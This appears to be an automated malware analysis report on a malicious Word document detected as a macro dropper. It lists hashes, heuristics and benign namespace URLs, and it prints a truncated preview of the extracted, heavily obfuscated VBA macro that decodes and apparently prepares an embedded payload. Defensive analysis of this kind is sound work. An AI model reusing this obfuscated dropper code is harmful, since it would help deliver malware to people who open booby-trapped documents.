Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 8cb61f7a1dcc6d66…

MALICIOUS

Office (OLE)

Size: 218.5 KB | Created: 2017-11-14 13:16:00 | Authoring application: Microsoft Office Word | First seen: 2017-11-20
MD5: 201e7d2d54f711d16601f513b2de7d33
SHA-1: f6c0af383b19ed88a5b38f11deee18c747da66dd
SHA-256: 8cb61f7a1dcc6d66e2cab537313e710ce25c657b2f9d3222ba7cbd781e8be613
Risk Score: 162

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1566.001 Phishing: Spearphishing Attachment

The sample is identified as malicious by ClamAV with the signature Doc.Dropper.Agent-6387646-0. It contains a VBA macro within the Document_Open event, which is a common technique for executing malicious code upon opening the document. The macro's obfuscated nature and the presence of a large slack space in the OLE structure suggest it is designed to download and execute a secondary payload.

Heuristics (5)

  • ClamAV: Doc.Dropper.Agent-6387646-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6387646-0
  • OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY
    OLE file is 223,728 bytes but its declared streams total only 130,417 bytes — 93,311 bytes (42%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • VBA macros detected medium (1 related finding) OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    The macro is attached to the Document_Open event, so it runs as soon as the document is opened (subject to the macro security setting)
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://ns.adobe.com/xap/1.0/ (in document text, OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns# (in document text, OLE body)
    • http://ns.adobe.com/camera-raw-settings/1.0/ (in document text, OLE body)
    • http://ns.adobe.com/photoshop/1.0/ (in document text, OLE body)
    • http://purl.org/dc/elements/1.1/ (in document text, OLE body)
    • http://ns.adobe.com/xap/1.0/mm/ (in document text, OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent# (in document text, OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef# (in document text, OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 11680 bytes
SHA-256: 1197c32d595cfbe4c2c86431efac1f8fe0f948ac7bf1bf92a37fac5c14faab67

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function hominoid()
Dim bisulcated As Byte
Dim carnivore As Integer
fibrocalcific.penmanship.Value = Day(#12/5/2013#)
varday = therapeutics = "impulsiveness"
foundered = "decampment"
antisocial = proximate
certified = "stockman"
alula = "splatter"
lycaena = against
counteroffer = "similarly"
courtelle = "huntington"
Set apodidae = fibrocalcific.penmanship.SelectedItem
admiralty = 43 + 40
Pmt 0, admiralty, 27945, 16250, 2
privateer = apodidae.Name
donee = 114 - 59 + 7789
animallike = Right(privateer, donee)
omnifarious = converted(animallike)
clap = 4 + 51
Pmt 0, clap, 9684, 37824, 2
kismet = "aspergillosis"
baldacchino = "lygaeidae"
#If (105 - 82 + 377 + 74 - 27 + 253) > ((91 - 23 + 252) - (101 - 87 + 526) * 1) And (21 - 7 * 3) * 2 < (Win64) Then
Dim worrying As Variant
Dim ravenous As LongPtr
Dim anisoptera As LongPtr
Dim compo As Integer
Dim gecko As Long
Dim desmidium As LongPtr
Dim buttonhole As LongPtr
Dim yager As LongPtr
bacchanal = 76 - 80 + 2068
#End If
#If (105 - 82 + 377 + 74 - 27 + 253) > ((91 - 23 + 252) - (101 - 87 + 526) * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then
Dim chronologer As Byte
Dim anisoptera As Long
Dim finetoothed As String
Dim ravenous As Long
Dim desmidium As Long
millenarianism = 47 - 44 + 778
Dim buttonhole As Long
Dim yager As Long
bacchanal = millenarianism + 3459
#End If
knobble = 46 - 56 + 10
detritus = "conilurus"
beneficially = 17 - 100 + 4179
ascend = 40 + 38
Pmt 0, ascend, 35503, 42179, 4
combed = partout
concise = "straightbacked"
seines = "dairying"
hypsiprymnodon = 37 + 38
Pmt 0, hypsiprymnodon, 27591, 53253, 2
miscue = omnifarious
victim = "abomination"
ravenous = scrap(miscue)
gastrocybe = embolismal
bountiful = "epithalamium"
Dim intentionality As Integer
Dim innkeeper As Integer
desmidium = 8 - 25 + 17
anisoptera = ravenous + bacchanal
buttonhole = 91 - 60 + 201496
yager = 68 - 120 + 3552
accompanied = autosomal(buttonhole, desmidium, anisoptera, desmidium, desmidium, desmidium, desmidium)
odzookens = 22 + 33
Pmt 0, odzookens, 28400, 15052, 2
End Function
Function converted(grimy) As String
Dim rewarding() As Byte
Dim pianistic As Long
Dim brassard(63) As Long
Dim cloisters(63) As Long
Dim achromatin As Long
Dim bibliography(6962) As Byte
Dim arguer As Long
Dim prophet As Long
Dim bargee(63) As Long
fame = 17 - 95 + 65358
metaphrastic = 114 - 18 + 65440
fracas = 99 - 12 + 16711593
nix = 86 - 106 + 276
anorthite = 128 - 28 - 36
meristem = 128 - 44 + 262060
historiography = 1 - 48 + 302
biologically = 56 - 76 + 4116
Dim sanitaire As String
Dim centipede() As Byte
centipede = VBA.StrConv(grimy, 128)
hiccup = 3 + 12
Pmt 0, hiccup, 22358, 49698, 7
napier = 7840 + 3
heads = vbKeyShift - 12
For carcharhinidae = (3 - 3) To napier
If carcharhinidae Mod (3 - 1) = (4 - 4) Then
centipede(carcharhinidae) = centipede(carcharhinidae) - heads
ElseIf 1 = 1 Then
centipede(carcharhinidae) = centipede(carcharhinidae) - (heads - 1)
End If
Next carcharhinidae
serve = 22 + 33
Pmt 0, serve, 13227, 52276, 8
forewarn = genera
For arguer = (16 - 8 * 2) * 1 To (80 / 2 + 23) * (7 - 6)
bargee(arguer) = ascites(arguer, anorthite, 50 + 3)
cloisters(arguer) = ascites(arguer, biologically, 50 + 3)
brassard(arguer) = ascites(arguer, meristem, 50 + 3)
Next arguer
Brightness = 57 + 18
Pmt 0, Brightness, 27386, 20261, 4
rewarding = centipede
academical = 47 + 22
Pmt 0, academical, 18094, 33596, 2
purposive = 19 - 76 + 60
missive = 121 - 120 + 1
For prophet = (5 - 5) To napier
botch = rewarding(prophet)
covert = rewarding(prophet + 2)
bouffant = cloisters(forewarn(rewarding(prophet + 1)))
escalation = bargee(forewarn(covert)) + forewarn(rewarding(prophet + purposive))
pianistic = brassard(forewarn(botch)) + bouffa
... (truncated)